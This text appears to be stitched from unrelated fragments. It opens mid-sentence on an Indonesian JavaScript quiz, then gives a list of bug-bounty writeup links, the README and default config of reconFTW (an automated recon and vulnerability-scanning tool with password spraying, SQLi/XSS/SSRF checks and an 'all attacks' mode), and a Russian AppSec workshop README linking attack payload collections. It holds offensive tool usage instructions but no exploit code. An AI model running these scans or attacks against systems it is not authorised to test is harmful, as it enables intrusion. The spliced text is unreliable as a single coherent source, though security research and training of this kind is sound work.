pernyataan `else` dijalankan, dan `Yay it's a string!` Akan dicatat. </p> </details> ---
# Writeups ## Web ### Facebook - https://medium.com/bugbountywriteup/disclose-private-attachments-in-facebook-messenger-infrastructure-15-000-ae13602aa486 - https://www.vulnano.com/2019/03/facebook-messenger-server-random-memory.html - https://vinothkumar.me/20000-facebook-dom-xss/ ### Google - https://www.ezequiel.tech/p/36k-google-app-engine-rce.html - https://www.ezequiel.tech/p/10k-host-header.html - https://www.ezequiel.tech/2019/01/75k-google-cloud-platform-organization.html - https://www.ezequiel.tech/p/5k-service-dependencies.html - https://www.ezequiel.tech/p/75k-google-services-mix-up.html - https://blog.bentkowski.info/2018/06/xss-in-google-colaboratory-csp-bypass.html - https://blog.bentkowski.info/2018/09/another-xss-in-google-colaboratory.html - https://blog.bentkowski.info/2017/11/yet-another-google-caja-bypasses-hat.html - https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff - https://blog.bentkowski.info/2016/07/xss-es-in-google-caja.html - https://blog.bentkowski.info/2015/05/xss-via-file-upload-wwwgooglecom.html - https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html - https://blog.bentkowski.info/2014/09/in-this-post-ill-explain-to-you.html - https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/ - https://blog.avatao.com/How-I-could-steal-your-photos-from-Google/ - https://medium.com/@raushanraj_65039/google-clickjacking-6a04132b918a ### Paypal - https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c - http://artsploit.blogspot.com/2016/08/pprce2.html - http://artsploit.blogspot.com/2016/01/paypal-rce.html - https://seanmelia.files.wordpress.com/2015/12/paypal-xxe-doc.pdf - https://www.anquanke.com/post/id/86477 ### Hackerone - https://hackerone.com/reports/489146 - https://hackerone.com/reports/398054 - https://hackerone.com/reports/474656 ### Airbnb - https://buer.haus/2017/03/09/airbnb-chaining-third-party-open-redirect-into-server-side-request-forgery-ssrf-via-liveperson-chat/ ### Shopify - https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html # Categories ## Web ### JavaScript Prototype Poisoning - https://bbs.pediy.com/thread-249643.htm - https://medium.com/intrinsic/javascript-prototype-poisoning-vulnerabilities-in-the-wild-7bc15347c96 - https://hackerone.com/reports/310443 - https://xz.aliyun.com/t/2802 - https://github.com/HoLyVieR/prototype-pollution-nsec18 - https://xz.aliyun.com/t/2735 ### Bugzilla - https://bugzilla.mozilla.org/show_bug.cgi?id=1544304 ### Websocket Fuzzer - https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/ ### ImageMagick Exp - https://www.softwaresecured.com/imagemagick-rce-take-2/ - http://gv7.me/articles/2018/ghostscript-rce-20180821/ ### Fastjson - https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 - https://github.com/FasterXML/jackson-databind/issues?q=label%3ACVE+is%3Aclosed - https://adamcaudill.com/2017/10/04/exploiting-jackson-rce-cve-2017-7525/ ### K8S - https://www.freebuf.com/news/196993.html
<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.1.0"> <img src="https://img.shields.io/badge/release-v2.1.0-green"> </a> </a> <a href="https://www.gnu.org/licenses/gpl-3.0.en.html"> <img src="https://img.shields.io/badge/license-GPL3-_red.svg"> </a> <a href="https://twitter.com/Six2dez1"> <img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue"> </a> <a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed"> <img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg"> </a> <a href="https://github.com/six2dez/reconftw/wiki"> <img src="https://img.shields.io/badge/doc-wiki-blue.svg"> </a> <a href="https://t.me/joinchat/H5bAaw3YbzzmI5co"> <img src="https://img.shields.io/badge/telegram-@ReconFTW-blue.svg"> </a> <a href="https://hub.docker.com/r/six2dez/reconftw"> <img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw"> </a> </p> <h3 align="center">Summary</h3> **ReconFTW** automates the entire process of reconnaisance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target. ReconFTW uses lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you getting the maximum and the most interesting subdomains so that you be ahead of the competition. It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target. So, what are you waiting for Go! Go! Go! :boom: 📔 Table of Contents ----------------- - [💿 Installation:](#-installation) - [a) In your PC/VPS/VM](#a-in-your-pcvpsvm) - [b) Docker container 🐳 (2 options)](#b-docker-container--2-options) - [1) From DockerHub](#1-from-dockerhub) - [2) From repository](#2-from-repository) - [⚙️ Config file:](#️-config-file) - [Usage:](#usage) - [Example Usage:](#example-usage) - [Axiom Support: :cloud:](#axiom-support-cloud) - [BBRF Support: :computer:](#bbrf-support-computer) - [Sample video:](#sample-video) - [:fire: Features :fire:](#fire-features-fire) - [Osint](#osint) - [Subdomains](#subdomains) - [Hosts](#hosts) - [Webs](#webs) - [Extras](#extras) - [Mindmap/Workflow](#mindmapworkflow) - [Data Keep](#data-keep) - [Main commands:](#main-commands) - [How to contribute:](#how-to-contribute) - [Need help? :information_source:](#need-help-information_source) - [You can support this work buying me a coffee:](#you-can-support-this-work-buying-me-a-coffee) - [Sponsors ❤️](#sponsors-️) - [Thanks :pray:](#thanks-pray) --- # 💿 Installation: ## a) In your PC/VPS/VM > You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book: - Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**) ```bash git clone https://github.com/six2dez/reconftw cd reconftw/ ./install.sh ./reconftw.sh -d target.com -r ``` ## b) Docker container 🐳 (2 options) - Docker parameters usage ``` bash -d -> Detached -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -> Share CFG with the Docker -v $PWD/Recon/:/root/Tools/reconftw/Recon/ -> Share output folder with the Host --name reconftwSCAN -> Docker name --rm -> Automatically remove the container when it exits '-d target.com -r' -> reconftw parameters ``` ### 1) From [DockerHub](https://hub.docker.com/r/six2dez/reconftw) ```bash docker pull six2dez/reconftw:main # Download and configure CFG file wget https://raw.githubusercontent.com/six2dez/reconftw/main/reconftw.cfg mkdir Recon docker run -d -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm six2dez/reconftw:main -d target.com -r ``` ### 2) From repository ```bash git clone https://github.com/six2dez/reconftw cd reconftw/Docker docker build -t reconftw . docker run -v $PWD/reconftw.cfg:/root/Tools/reconftw/reconftw.cfg -v $PWD/Recon/:/root/Tools/reconftw/Recon/ --name reconftwSCAN --rm reconftw -d target.com -r ``` # ⚙️ Config file: > A detailed explaintion of config file can be found here [Configuration file](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" profile_shell=".$(basename $(echo $SHELL))rc" reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) update_resolvers=true proxy_url="http://127.0.0.1:8080/" #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/notify.conf # No need to define #SUBFINDER_CONFIG=~/.config/subfinder/config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #UDORK_COOKIE="c_user=XXXXXXXXXX; xs=XXXXXXXXXXXXXX" #SHODAN_API_KEY="XXXXXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #findomain_virustotal_token="XXXXXXXXXXXXXXXXX" #findomain_spyse_token="XXXXXXXXXXXXXXXXX" #findomain_securitytrails_token="XXXXXXXXXXXXXXXXX" #findomain_fb_token="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" DEBUG_ERROR="2>/dev/null" # Osint OSINT=true GOOGLE_DORKS=true GITHUB_DORKS=true METADATA=true EMAILS=true DOMAIN_INFO=true METAFINDER_LIMIT=20 # Max 250 # Subdomains SUBDOMAINS_GENERAL=true SUBPASSIVE=true SUBCRT=true SUBANALYTICS=true SUBBRUTE=true SUBSCRAPING=true SUBPERMUTE=true SUBTAKEOVER=true SUBRECURSIVE=true SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries ZONETRANSFER=true S3BUCKETS=true REVERSE_IP=false # Web detection WEBPROBESIMPLE=true WEBPROBEFULL=true WEBSCREENSHOT=true UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # You can change to aquatone if gowitness fails, comment the one you don't want AXIOM_SCREENSHOT_MODULE=webscreenshot # Choose between aquatone,gowitness,webscreenshot # Host FAVICON=true PORTSCANNER=true PORTSCAN_PASSIVE=true PORTSCAN_ACTIVE=true CLOUD_IP=true # Web analysis WAF_DETECTION=true NUCLEICHECK=true NUCLEI_SEVERITY="info,low,medium,high,critical" URL_CHECK=true URL_GF=true URL_EXT=true JSCHECKS=true FUZZ=true CMS_SCANNER=true WORDLIST=true ROBOTSWORDLIST=true # Vulns VULNS_GENERAL=false XSS=true CORS=true TEST_SSL=true OPEN_REDIRECT=true SSRF_CHECKS=true CRLF_CHECKS=true LFI=true SSTI=true SQLI=true BROKENLINKS=true SPRAY=true COMM_INJ=true PROTO_POLLUTION=true # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false DEEP_LIMIT=500 DIFF=false REMOVETMP=false REMOVELOG=false PROXY=false SENDZIPNOTIFY=false PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 GOSPIDER_THREADS=50 GITDORKER_THREADS=5 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 ARJUN_THREADS=20 GAUPLUS_THREADS=10 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 is unlimited PUREDNS_TRUSTED_LIMIT=400 WEBSCREENSHOT_THREADS=200 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 # Timeouts CMSSCAN_TIMEOUT=3600 FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) AXIOM=false AXIOM_FLEET_LAUNCH=false AXIOM_FLEET_NAME="reconFTW" AXIOM_FLEET_COUNT=10 AXIOM_FLEET_REGIONS="eu-central" AXIOM_FLEET_SHUTDOWN=true # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" # BBRF BBRF_CONNECTION=false BBRF_SERVER=https://demo.bbrf.me/bbrf BBRF_USERNAME=user BBRF_PASSWORD=password # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' yellow='\033[0;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' reset='\033[0m' ``` </details> # Usage: > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: **TARGET OPTIONS** | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | **MODE OPTIONS** | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | **GENERAL OPTIONS** | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, _vps intended mode_) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | # Example Usage: **To perform a full recon on single target** ```bash ./reconftw.sh -d target.com -r ``` **To perform a full recon on a list of targets** ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` **Perform full recon with more time intense tasks** *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` **Perform recon in a multi domain target** ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` **Perform recon with axiom integration** ```bash ./reconftw.sh -d target.com -r -v ``` **Perform all steps (whole recon + all attacks) a.k.a. YOLO mode** ```bash ./reconftw.sh -d target.com -a ``` **Show help section** ```bash ./reconftw.sh -h ``` # Axiom Support: :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) * As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. * During the configuration of axiom you need to select `reconftw` as provisoner. * You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # BBRF Support: :computer: * To add reconFTW results to your [BBRF instance](https://github.com/honoki/bbrf-server) just add IP and credentials on reconftw.cfg file section dedicated to bbrf. * During the execution of the scans the results will be added dinamically when each step ends. * Even you can set up locally your BBRF instance to be able to visualize your results in a fancy web UI. # Sample video: ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information parser ([domainbigdata](https://domainbigdata.com/)) - Emails addresses and users ([theHarvester](https://github.com/laramies/theHarvester), [emailfinder](https://github.com/Josue87/EmailFinder)) - Password leaks ([pwndb](https://github.com/davidtavarez/pwndb) and [H8mail](https://github.com/khast3x/h8mail)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([uDork](https://github.com/m3n0sd0n4ld/uDork)) - Github Dorks ([GitDorker](https://github.com/obheda12/GitDorker)) ## Subdomains - Passive ([subfinder](https://github.com/projectdiscovery/subfinder), [assetfinder](https://github.com/tomnomnom/assetfinder), [amass](https://github.com/OWASP/Amass), [findomain](https://github.com/Findomain/Findomain), [crobat](https://github.com/cgboal/sonarsearch), [waybackurls](https://github.com/tomnomnom/waybackurls), [github-subdomains](https://github.com/gwen001/github-subdomains), [Anubis](https://jldc.me), [gauplus](https://github.com/bp0lr/gauplus)) - Certificate transparency ([ctfr](https://github.com/UnaPibaGeek/ctfr), [tls.bufferover](tls.bufferover.run) and [dns.bufferover](dns.bufferover.run))) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator)) - JS files & Source Code Scraping ([gospider](https://github.com/jaeles-project/gospider)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - Recursive search. - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dnsrecon](https://github.com/darkoperator/dnsrecon)) ## Hosts - IP and subdomains WAF checker ([cf-check](https://github.com/dwisiswant0/cf-check) and [wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [shodan-cli](https://cli.shodan.io/), Subdomains IP resolution with[resolveDomains](https://github.com/Josue87/resolveDomains)) - Port services vulnerability checks ([searchsploit](https://github.com/offensive-security/exploitdb)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) - Cloud providers check ([clouddetect](https://github.com/99designs/clouddetect)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx) and [unimap](https://github.com/Edu4rdSHL/unimap)) - Web screenshot ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - Url extraction ([waybackurls](https://github.com/tomnomnom/waybackurls), [gauplus](https://github.com/bp0lr/gauplus), [gospider](https://github.com/jaeles-project/gospider), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URLPatterns Search ([gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [LinkFinder](https://github.com/GerbenJavado/LinkFinder), [getjswords](https://github.com/m4ll0k/BBTz)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([gospider](https://github.com/jaeles-project/gospider)) - S3 bucket finder ([S3Scanner](https://github.com/sa7mon/S3Scanner)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Extras - Multithread ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support # Mindmap/Workflow ![Mindmap](images/mindmapv2.png) ## Data Keep Follow these simple steps to end up having a private repository with your `API Keys` and `/Recon` data. * Create a private __blank__ repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) * Clone your project: `git clone https://gitlab.com/example/reconftw-data` * Get inside the cloned repository: `cd reconftw-data` * Create branch with an empty commit: `git commit --allow-empty -m "Empty commit"` * Add official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) * Update upstream's repo: `git fetch upstream` * Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands: * Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` * Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute: If you want to contribute to this project you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## You can support this work buying me a coffee: [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) # Sponsors ❤️ **This section shows the current financial sponsors of this project** [<img src="https://pbs.twimg.com/profile_images/1360304248534282240/MomOFi40_400x400.jpg" width="100" height=auto>](https://github.com/0xtavian) # Thanks :pray: * Thank you for lending a helping hand towards the development of the project! - [Spyse](https://spyse.com/) - [Networksdb](https://networksdb.io/) - [Intelx](https://intelx.io/) - [BinaryEdge](https://www.binaryedge.io/) - [Censys](https://censys.io/) - [CIRCL](https://www.circl.lu/) - [Whoxy](https://www.whoxy.com/)
# SHIFT AppSec 2019 ## Стек технологий - Python3 + Flask ([uwsgi-nginx-flask-docker](https://github.com/tiangolo/uwsgi-nginx-flask-docker)) - Docker - Git - Firefox - Burp Suite - некоторые зависимости для python ## Как работаем Шаги: 1) Регистрируемся на [github.com](https://github.com), если нет аккаунта 2) Капитан команды делает fork [репозитория](https://github.com/act1on3/shift2019) к себе (кнопка `fork` вверху проекта) 3) Капитан команды добавляет в collaborators проекта остальных участников (`страница проекта` - `Settings` - `Collaborators` - `Search by username`) 4) Теперь репозиторий команды может редактировать любой учатник команды со своего аккаунта 5) Переходим (создаем) в директорию с названием уязвимости (если создаем, то используем lowercase и `_` вместо пробелов, например `jwt_insecure`) 6) Копируем шаблон `../example/README.md` в свою рабочую директорию 7) Используем директорию, редактируем `README.md` 8) Ресерчим! 9) Изменения заливаем через коммиты --- **Запрещается:** - изменять файлы в чужой рабочей директории (чужая уязвимость) - сохранять нетекстовые файлы (исключение - картинки) - лучше не переводить на русский специфичные определения --- ## Результаты Что хочется увидеть в итоге: 1) Полный ресерч по пунктам в файле `README.md` в директории с атакой/уязвимостью 2) Улучшение уязвимого приложения: расширить векторы возможной атаки; показать другие возможности эксплуатации; улучшить внешний вид уязвимого приложения 3) Добавить к уязвимому приложению безопасный вариант функционала. Т.е. новый метод, где атака/уязвимость не будет проявляться ## Подготовка ### Точно необходимо 1) Текстовый редактор, где удобно работать с Markdown (в принципе, можно редактировать средствами Github) 2) Firefox (можно и другой, но его удобнее настраивать) 3) Burp Suite ([ссылка](https://portswigger.net/burp/communitydownload)) ### Желательно 1) Python3 + IDE (советую Pycharm) 2) Git 3) Docker Если возникли проблемы с установкой желательного ПО - можно попробовать использовать VirtualBox (для виртуальной машины лучше ставить [Ubuntu](https://www.ubuntu.com/download/desktop)) Если возникли проблемы только с Docker - подходите, разберемся как быть:) ## Информация для ресерча ### Open redirect Ссылки: - Интерактивный урок: https://www.hacksplaining.com/exercises/open-redirects - Описание, детектирование, пейлоады: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20redirect - Open Redirect от OWASP: https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet - Пример репорта баги: https://hackerone.com/reports/387007 и Google Dork `site:hackerone.com open redirect` - Пейлоады для баг-баунти: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md - Статья с дополнительными фишками (обходы фильтров): https://medium.com/bugbountywriteup/cvv-2-open-redirect-213555765607 - Дополнительная информация: https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Karbutov_CRLF_PDF.pdf ### CRLF Ссылки: - Расширенное описание: https://prakharprasad.com/crlf-injection-http-response-splitting-explained/ - Описание, основная инфа, пейлоады: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20injection - XSS через CRLF на hackerone: https://vulners.com/hackerone/H1:192749 - Пример репорта баги: Google Dork `site:hackerone.com crlf` - Шпаргалка от EdOverflow: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md - CRLF to XSS: https://habr.com/ru/company/pt/blog/247709/ - Дополнительная информация: https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Karbutov_CRLF_PDF.pdf ### SSRF Ссылки: - Описание от DSec: https://dsec.ru/wp-content/uploads/2018/09/techtrain_ssrf.pdf - Описание, пейлоады, техники: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SSRF%20injection/README.md - Очень дорогой SSRF-баг на hackerone: https://hackerone.com/reports/341876 - A new Era of SSRF by Orange Tsai: https://www.blackhat.com/docs/asia-18/asia-18-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf ### Template Injection - Статья с описанием от albinowax: https://portswigger.net/blog/server-side-template-injection - Ресерч, пэйлоады и др: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20injections - Статья с описанием от defcon.ru: https://defcon.ru/web-security/3840/ - Статьи с описанием SSTI во Flask: https://nvisium.com/blog/2015/12/07/injecting-flask.html https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii.html - Инструмент для автоматической эксплуатации: https://github.com/epinna/tplmap ### CSRF - Интерактивный урок: https://www.hacksplaining.com/exercises/csrf - Варианты защиты: https://habr.com/ru/post/318748/ - Описание и защита: https://learn.javascript.ru/csrf - Обход при эксплуатации при типе данных JSON: https://www.geekboy.ninja/blog/exploiting-json-cross-site-request-forgery-csrf-using-flash/ и https://blog.appsecco.com/exploiting-csrf-on-json-endpoints-with-flash-and-redirects-681d4ad6b31b - Описание, обход, эксплуатация: https://2017.zeronights.org/wp-content/uploads/materials/ZN17_MikhailEgorov%20_Neat_tricks_to_bypass_CSRF_protection.pdf - Описание, защита - https://2017.zeronights.org/wp-content/uploads/materials/csrf_cors_etc.pdf ### JWT insecure - Описание проблем технологии: https://www.slideshare.net/snyff/jwt-insecurity - Потестировать токены: https://jwt.io/ - Шпаргалка с чек-листом для тестирования: https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf - Описание, информация: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token ### PHP Type Juggling - Описание, таблицы, примеры багов: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf - Информация об эксплуатации: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/PHP%20juggling%20type ### Deserialization - Ресерч десериализация в Java: https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf - Шпаргалка от OWASP: https://www.owasp.org/index.php/Deserialization_Cheat_Sheet#Guidance_on_Deserializing_Objects_Safely - Шпаргалка от GrrrDog: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet - Уязвимые приложения (Python, nodejs, Java (native binary and jackson)): https://github.com/GrrrDog/ZeroNights-WebVillage-2017 - Ресерч по десериализации в Ruby: https://lab.wallarm.com/exploring-de-serialization-issues-in-ruby-projects-801e0a3e5a0a ## Шпаргалка ### Markdown Для написания информации по ресерчу используем Markdown-разметку. Что понадобится: - шпаргалка по синтаксису есть [тут](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) - лучше использовать удобный текстовый редактор (я использую [Sublime Text](https://www.sublimetext.com/)) - лучше в текстовом редакторе поставить плагин для предпроссмотра Markdown-файлов (я использую [этот](https://packagecontrol.io/packages/MarkdownPreview)) ### Python Будем использовать Python + Flask. Установка окружения: - Windows http://timmyreilly.azurewebsites.net/python-pip-virtualenv-installation-on-windows/ - Linux https://itsfoss.com/python-setup-linux/ Создать виртуальное окружение (можно без него, тогда надо использовать `pip3`): - `cd <directory>` - `virualenv` Появится директория `venv` со структурой: ``` ├── bin │   ├── activate │   ├── activate.csh │   ├── activate.fish │   ├── easy_install │   ├── easy_install-3.6 │   ├── flask │   ├── pip │   ├── pip3 │   ├── pip3.6 │   ├── python │   ├── python3 │   └── python3.6 ├── include ├── lib │   └── python3.6 ├── lib64 -> lib ├── pip-selfcheck.json └── pyvenv.cfg ``` Используем бинарники отсюда: `venv/bin/` Установить Flask: - `venv/bin/pip3 install flask` ### Git Установка: 